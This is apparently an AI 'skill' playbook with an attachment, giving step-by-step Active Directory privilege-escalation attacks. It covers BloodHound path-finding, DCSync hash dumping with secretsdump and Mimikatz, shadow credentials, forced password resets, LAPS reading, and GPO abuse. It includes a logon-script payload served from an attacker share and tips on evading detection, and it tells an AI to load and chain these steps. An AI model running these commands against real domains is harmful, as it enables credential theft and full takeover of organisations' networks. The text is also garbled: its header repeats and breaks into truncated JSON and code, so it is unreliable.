SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…

-delegate-to 'TARGET

SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…

-action write DOMAIN/user:pass -dc-ip DC\n\n# Shadow Credentials on computer\npywhisker.py -d domain.com -u user -p pass --target 'TARGET

SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…

--action add --dc-ip DC\n```\n\n### WriteDACL\n\n```powershell\n# Grant DCSync rights to yourself\nAdd-DomainObjectAcl -TargetIdentity \"DC=domain,DC=com\" -PrincipalIdentity lowpriv -Rights DCSync\n\n# Impacket\ndacledit.py -action write -rights DCSync -principal lowpriv -target-dn \"DC=domain,DC=com\" DOMAIN/lowpriv:pass -dc-ip DC\n```\n\n### WriteOwner\n\n```powershell\n# Step 1: Take ownership\nSet-DomainObjectOwner -Identity targetuser -OwnerIdentity lowpriv\n\n# Step 2: Grant WriteDACL to yourself (as owner)\nAdd-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity lowpriv -Rights All\n\n# Step 3: Now exploit as GenericAll\n```\n\n### ForceChangePassword\n\n```bash\n# Impacket\nrpcclient -U 'DOMAIN/attacker%pass' DC01 -c \"setuserinfo2 targetuser 23 'NewP@ss123!'\"\n\n# PowerView\nSet-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)\n\n# net rpc\nnet rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01\n```\n\n### AddMember to Group\n\n```powershell\n# Add self to privileged group\nAdd-DomainGroupMember -Identity \"Domain Admins\" -Members lowpriv\n\n# Impacket\nnet rpc group addmem \"Domain Admins\" lowpriv -U DOMAIN/attacker%pass -S DC01\n```\n\n---\n\n## 4. DCSYNC ATTACK\n\n### Prerequisites\nThe principal needs **both** of these replication rights on the domain object:\n- `DS-Replication-Get-Changes` (GUID: `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2`)\n- `DS-Replication-Get-Changes-All` (GUID: `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2`)\n\n### Execution\n\n```bash\n# Impacket — dump all hashes\nsecretsdump.py DOMAIN/user:password@DC01 -just-dc\n\n# Specific account only\nsecretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt\n\n# Mimikatz\nlsadump::dcsync /domain:domain.com /user:krbtgt\nlsadump::dcsync /domain:domain.com /all /csv\n\n# Impacket with Kerberos auth\nexport KRB5CCNAME=admin.ccache\nsecretsdump.py -k -no-pass DC01.domain.com -just-dc\n```\n\n### Who Has DCSync by Default?\n\n- Domain Admins\n- Enterprise Admins\n- Domain Controllers group\n- `BUILTIN\\Administrators` (on domain object)\n\n---\n\n## 5. SHADOW CREDENTIALS\n\n### Attack Flow\n\nWrite `msDS-KeyCredentialLink` on target → generate certificate → authenticate via PKINIT.\n\n```bash\n# pyWhisker (Linux)\npywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01\n# Output: DeviceID and PFX file\n\n# Authenticate with certificate\ngettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache\nexport KRB5CCNAME=victim.ccache\n\n# Extract NT hash from TGT (for pass-the-hash)\ngetnthash.py -key AS_REP_KEY domain.com/victim\n```\n\n```powershell\n# Whisker (Windows)\nWhisker.exe add /target:victim /domain:domain.com /dc:DC01.domain.com\n# → Provides Rubeus command to get TGT\nRubeus.exe asktgt /user:victim /certificate:CERT_B64 /password:PASS /ptt\n```\n\n**Cleanup**: Remove the added key credential to avoid detection.\n\n---\n\n## 6. LAPS PASSWORD READING\n\n```powershell\n# PowerView\nGet-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime\n\n# AD Module\nGet-ADComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd\n\n# LAPS v2 (Windows LAPS)\nGet-LapsADPassword -Identity TARGET -AsPlainText\n\n# CrackMapExec\ncrackmapexec ldap DC01 -u user -p pass --module laps\n```\n\n---\n\n## 7. GPO ABUSE\n\n### Identify Writable GPOs\n\n```powershell\n# PowerView — find GPOs where you have write access\nGet-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {\n ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite') -and\n ($_.SecurityIdentifier -match 'YOUR_SID')\n}\n```\n\n### Exploit via SharpGPOAbuse\n\n```cmd\n# Add local admin via GPO\nSharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName \"Vulnerable GPO\"\n\n# Add scheduled task via GPO\nSharpGPOAbuse.exe --AddComputerTask --TaskName \"Update\" --Author DOMAIN\\admin --Command \"cmd.exe\" --Arguments \"/c net localgroup administrators lowpriv /add\" --GPOName \"Vulnerable GPO\"\n\n# Add startup script\nSharpGPOAbuse.exe --AddComputerScript --ScriptName \"evil.bat\" --ScriptContents \"net localgroup administrators lowpriv /add\" --GPOName \"Vulnerable GPO\"\n```\n\n```bash\n# pyGPOAbuse (Linux)\npygpoabuse.py DOMAIN/user:pass -gpo-id \"GPO_GUID\" -command \"net localgroup administrators lowpriv /add\" -dc-ip DC01\n```\n\n---\n\n## 8. ACL ATTACK DECISION TREE\n\n```\nHave domain user access — want to escalate via ACL\n│\n├── Run BloodHound → analyze shortest paths to DA\n│ └── Upload data → \"Shortest Paths to Domain Admins from Owned Principals\"\n│\n├── Direct ACL on user object?\n│ ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3)\n│ ├── GenericWrite → shadow credentials or set SPN (§3/§5)\n│ ├── ForceChangePassword → reset password directly (§3)\n│ ├── WriteDACL → grant yourself GenericAll, then exploit (§3)\n│ └── WriteOwner → take ownership → WriteDACL → GenericAll (§3)\n│\n├── ACL on group?\n│ ├── AddMember / GenericAll → add self to privileged group (§3)\n│ └── WriteDACL → grant AddMember, then add self\n│\n├── ACL on computer object?\n│ ├── GenericAll/GenericWrite → RBCD attack (§3)\n│ ├── AllExtendedRights → read LAPS password (§6)\n│ └── GenericWrite → shadow credentials on machine (§5)\n│\n├── ACL on domain object?\n│ ├── WriteDACL → grant DCSync rights to self (§4)\n│ └── Replication rights already? → DCSync directly (§4)\n│\n├── ACL on GPO linked to privileged OU?\n│ └── Write access → add admin / scheduled task via GPO (§7)\n│\n└── Complex multi-hop chain?\n └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis\n```\n---","attachment_filenames":["BLOODHOUND_PATHS.md"],"attachments":[{"filename":"BLOODHOUND_PATHS.md","content":"# BloodHound Attack Paths & Cypher Queries\n\n> **AI LOAD INSTRUCTION**: Load this for common BloodHound attack paths, custom Cypher queries for Neo4j, and chain analysis techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual ACL abuse techniques.\n\n---\n\n## 1. BLOODHOUND DATA COLLECTION BEST PRACTICES\n\n### Collection Methods Comparison\n\n| Method | Speed | Noise | Data |\n|---|---|---|---|\n| `DCOnly` | Fast | Low | Users, groups, trusts, ACLs (from DC only) |\n| `All` | Slow | High | Everything including sessions and local groups |\n| `Session` | Medium | Medium | Logged-in user sessions (run multiple times) |\n| `ACL` | Medium | Low | ACL data only |\n| `ObjectProps` | Fast | Low | Object properties (descriptions, etc.) |\n\n### Stealth Collection\n\n```bash\n# Minimum noise — DC only queries\nbloodhound-python -d domain.com -u user -p pass -c DCOnly -dc DC01.domain.com\n\n# Add sessions over time\nbloodhound-python -d domain.com -u user -p pass -c Session -dc DC01.domain.com\n\n# Avoid SMB enumeration (noisiest)\nSharpHound.exe -c DCOnly,ACL --excludedc --stealth\n```\n\n---\n\n## 2. ESSENTIAL CYPHER QUERIES\n\n### 2.1 Find All Paths to Domain Admin\n\n```cypher\nMATCH p=shortestPath((n)-[*1..]->(m:Group))\nWHERE m.name STARTS WITH \"DOMAIN ADMINS\"\nAND n.owned = true\nRETURN p\n```\n\n### 2.2 Find Users with DCSync Rights\n\n```cypher\nMATCH p=(n)-[:MemberOf|GetChanges*1..]->(d:Domain)\nMATCH p2=(n)-[:MemberOf|GetChangesAll*1..]->(d)\nWHERE n:User OR n:Group\nRETURN n.name\n```\n\n### 2.3 Kerberoastable Users with Paths to DA\n\n```cypher\nMATCH (u:User {hasspn:true})\nMATCH p=shortestPath((u)-[*1..]->(g:Group))\nWHERE g.name STARTS WITH \"DOMAIN ADMINS\"\nRETURN u.name, length(p) AS hops\nORDER BY hops ASC\n```\n\n### 2.4 Users with Dangerous ACLs\n\n```cypher\nMATCH p=(n:User)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|ForceChangePassword]->(m)\nWHERE NOT n.name STARTS WITH \"DVTA\"\nRETURN n.name AS attacker, type(r) AS permission, m.name AS target\n```\n\n### 2.5 Find Computers with Unconstrained Delegation\n\n```cypher\nMATCH (c:Computer {unconstraineddelegation:true})\nWHERE NOT c.name STARTS WITH \"DC\"\nRETURN c.name\n```\n\n### 2.6 Find AS-REP Roastable Users\n\n```cypher\nMATCH (u:User {dontreqpreauth:true})\nRETURN u.name, u.description\n```\n\n### 2.7 Computers Where Domain Users Are Local Admin\n\n```cypher\nMATCH p=(g:Group {name:\"DOMAIN [email protected]\"})-[:AdminTo]->(c:Computer)\nRETURN c.name\n```\n\n### 2.8 Find All GPO Controllers\n\n```cypher\nMATCH p=(n)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO)\nRETURN n.name AS controller, g.name AS gpo, type(r) AS permission\n```\n\n### 2.9 Shortest Path from Owned to High-Value Targets\n\n```cypher\nMATCH p=shortestPath((n {owned:true})-[*1..]->(m {highvalue:true}))\nRETURN p\n```\n\n### 2.10 Find LAPS Readers\n\n```cypher\nMATCH p=(n)-[:ReadLAPSPassword]->(c:Computer)\nRETURN n.name AS reader, c.name AS computer\n```\n\n---\n\n## 3. COMMON ATTACK PATH PATTERNS\n\n### Pattern 1: Nested Group Membership → DA\n\n```\nlowpriv_user\n └── MemberOf → IT-Support\n └── MemberOf → Server-Admins\n └── MemberOf → Domain Admins\n```\n\n```cypher\nMATCH p=(u:User {name:\"[email protected]\"})-[:MemberOf*1..5]->(g:Group {name:\"DOMAIN [email protected]\"})\nRETURN p\n```\n\n### Pattern 2: ACL Chain → GenericAll → Password Reset → DA\n\n```\nlowpriv_user\n └── GenericWrite → helpdesk_user\n └── GenericAll → svc_admin (DA member)\n └── ForceChangePassword → reset password → DA\n```\n\n### Pattern 3: WriteDACL → DCSync\n\n```\nlowpriv_user\n └── WriteDACL on Domain Object\n └── Grant self GetChanges + GetChangesAll\n └── DCSync → all domain hashes\n```\n\n### Pattern 4: GPO Abuse → Local Admin on DC\n\n```\nlowpriv_user\n └── GenericWrite on GPO linked to \"Domain Controllers\" OU\n └── Add scheduled task via GPO\n └── Task runs on DCs → SYSTEM on DC\n```\n\n### Pattern 5: LAPS + Local Admin → Session Hijack\n\n```\nlowpriv_user\n └── ReadLAPSPassword on TARGET_SERVER\n └── Local admin on TARGET_SERVER\n └── Domain Admin session on TARGET_SERVER\n └── Credential dump → DA hash\n```\n\n---\n\n## 4. CUSTOM BLOODHOUND QUERIES FOR SPECIFIC SCENARIOS\n\n### Find Users with Passwords in Description\n\n```cypher\nMATCH (u:User)\nWHERE u.description =~ '(?i).*(pass|pwd|cred|secret).*'\nRETURN u.name, u.description\n```\n\n### Find All ACL Paths Between Two Nodes\n\n```cypher\nMATCH p=allShortestPaths((a)-[r*1..7]->(b))\nWHERE a.name = \"[email protected]\"\nAND b.name = \"DOMAIN [email protected]\"\nAND ALL(rel IN relationships(p) WHERE type(rel) IN\n [\"GenericAll\",\"GenericWrite\",\"WriteDacl\",\"WriteOwner\",\"ForceChangePassword\",\n \"AddMember\",\"MemberOf\",\"AdminTo\",\"HasSession\",\"CanRDP\",\"CanPSRemote\"])\nRETURN p\n```\n\n### High-Value Target Identification\n\n```cypher\nMATCH (n)\nWHERE n.highvalue = true\nRETURN labels(n)[0] AS type, n.name AS target\nORDER BY type\n```\n\n### Find Kerberoastable Service Accounts with Admin Rights\n\n```cypher\nMATCH (u:User {hasspn:true})-[:AdminTo]->(c:Computer)\nRETURN u.name AS service_account, collect(c.name) AS admin_on\n```\n\n### Computers Trusting Machine Accounts for Delegation\n\n```cypher\nMATCH (c1:Computer)-[:AllowedToDelegate]->(c2:Computer)\nRETURN c1.name AS delegator, c2.name AS target\n```\n\n---\n\n## 5. BLOODHOUND CE (COMMUNITY EDITION) TIPS\n\n### API Queries (BloodHound CE)\n\n```bash\n# List available attack paths via API\ncurl -s -H \"Authorization: Bearer $TOKEN\" \\\n \"https://bloodhound.local/api/v2/attack-paths\" | jq\n\n# Get path findings for a specific domain\ncurl -s -H \"Authorization: Bearer $TOKEN\" \\\n \"https://bloodhound.local/api/v2/domains/$DOMAIN_ID/attack-path-findings\" | jq\n```\n\n### Mark Nodes as Owned\n\n```cypher\n# Mark compromised user\nMATCH (u:User {name:\"[email protected]\"})\nSET u.owned = true\nRETURN u.name\n```\n\n### Mark High-Value Targets\n\n```cypher\n# Mark custom high-value targets\nMATCH (c:Computer {name:\"SQLSERVER01.DOMAIN.COM\"})\nSET c.highvalue = true\nRETURN c.name\n```\n\n---\n\n## 6. ATTACK PATH DECISION FLOW\n\n```\nBloodHound data collected and imported\n│\n├── Mark owned principals (compromised users/computers)\n│\n├── Run \"Shortest Paths from Owned to DA\"\n│ ├── Direct path found? → follow the chain\n│ │ ├── ACL edge → exploit per SKILL.md §3\n│ │ ├── Session edge → credential dump on that host\n│ │ └── AdminTo edge → lateral movement to host\n│ └── No path found?\n│ ├── Run custom queries (§4) for non-obvious paths\n│ ├── Check for Kerberoastable → high-value paths (§2.3)\n│ └── Look for LAPS readers → local admin chains (§2.10)\n│\n├── No path to DA at all?\n│ ├── Check for paths to other high-value targets\n│ ├── Expand attack surface: compromise more users/hosts\n│ ├── Re-collect session data (sessions change over time)\n│ └── Look for cross-domain trust paths\n│\n└── Multiple paths available?\n ├── Prefer: ForceChangePassword (cleanest)\n ├── Then: Shadow Credentials (reversible)\n ├── Then: Targeted Kerberoast (if crackable)\n └── Avoid: Adding to Domain Admins (noisy)\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":7305,"content_sha256":"285eb5fdf7f283e10b4ad87c7f019c53b983c86c59c9d01fa038c3d954c2607e"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"SKILL: AD ACL Abuse — Expert Attack Playbook","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"AI LOAD INSTRUCTION","type":"text","marks":[{"type":"strong"}]},{"text":": Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"0. RELATED ROUTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Before going deep, consider loading:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-kerberos-attacks","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-kerberos-attacks/SKILL.md","title":null}}]},{"text":" for Kerberos attacks often chained with ACL abuse","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-certificate-services","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-certificate-services/SKILL.md","title":null}}]},{"text":" for certificate-based attacks after ACL exploitation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ntlm-relay-coercion","type":"text","marks":[{"type":"link","attrs":{"href":"../ntlm-relay-coercion/SKILL.md","title":null}}]},{"text":" for relay attacks that can set ACLs (LDAP relay)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"windows-lateral-movement","type":"text","marks":[{"type":"link","attrs":{"href":"../windows-lateral-movement/SKILL.md","title":null}}]},{"text":" after gaining elevated AD access","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Advanced Reference","type":"text"}]},{"type":"paragraph","content":[{"text":"Also load ","type":"text"},{"text":"BLOODHOUND_PATHS.md","type":"text","marks":[{"type":"link","attrs":{"href":"./BLOODHOUND_PATHS.md","title":null}}]},{"text":" when you need:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Common BloodHound attack paths with Cypher queries","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Custom Neo4j queries for finding complex chains","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data collection and ingestion tips","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"1. BLOODHOUND ENUMERATION","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Data Collection","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# SharpHound (from Windows, domain-joined)\nSharpHound.exe -c all --outputdirectory C:\\temp --zipfilename bh.zip\n\n# bloodhound-python (from Linux)\nbloodhound-python -d domain.com -u user -p password -c all -dc DC01.domain.com -ns DC_IP\n\n# Specific collection methods\nSharpHound.exe -c DCOnly # Fastest — only DC queries\nSharpHound.exe -c Session # Session data only (run periodically)\nSharpHound.exe -c All,GPOLocalGroup # Include GPO analysis","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Key BloodHound Queries (Built-in)","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"\"Find all Domain Admins\"","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"\"Shortest Paths to Domain Admins from Owned Principals\"","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"\"Find Principals with DCSync Rights\"","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"\"Shortest Paths to Unconstrained Delegation Systems\"","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"\"Find computers where Domain Users are Local Admin\"","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"2. DANGEROUS ACE TYPES","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ACE","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Effect on Users","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Effect on Groups","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Effect on Computers","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"GenericAll","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Change password, set SPN, modify attributes","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Add members","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"RBCD, LAPS read, all attributes","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"GenericWrite","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Set SPN, modify attributes, shadow creds","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Add members","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"RBCD, shadow credentials","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WriteDACL","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Grant yourself any permission","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Same","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Same","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WriteOwner","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Take ownership → then WriteDACL","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Same","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Same","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ForceChangePassword","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Reset password without knowing old","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"AddMember","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Add self/others to group","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"AllExtendedRights","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Force change password, read LAPS","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Read LAPS, BitLocker keys","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ReadLAPSPassword","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Read local admin password","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WriteSPN","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Set SPN → targeted kerberoast","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"N/A","type":"text"}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"3. ACE-SPECIFIC EXPLOITATION","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"GenericAll on User","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"powershell"},"content":[{"text":"# Option 1: Force change password\nnet user targetuser NewP@ss123 /domain\n\n# Option 2: Targeted Kerberoasting\nSet-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/svc'}\n# → Kerberoast, then clear SPN\n\n# Option 3: Shadow Credentials\nWhisker.exe add /target:targetuser /domain:domain.com /dc:DC01\n\n# Option 4: Set logon script\nSet-DomainObject -Identity targetuser -Set @{scriptpath='\\\\attacker\\share\\evil.ps1'}","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"GenericAll / GenericWrite on Computer","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# RBCD attack\nrbcd.py -delegate-from 'CONTROLLED

SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…

-delegate-to 'TARGET

SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…

-action write DOMAIN/user:pass -dc-ip DC\n\n# Shadow Credentials on computer\npywhisker.py -d domain.com -u user -p pass --target 'TARGET

SKILL: AD ACL Abuse — Expert Attack Playbook AI LOAD INSTRUCTION : Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse - active-directory-certificate-services for certificate-based attacks after ACL exploitation - ntlm-r…

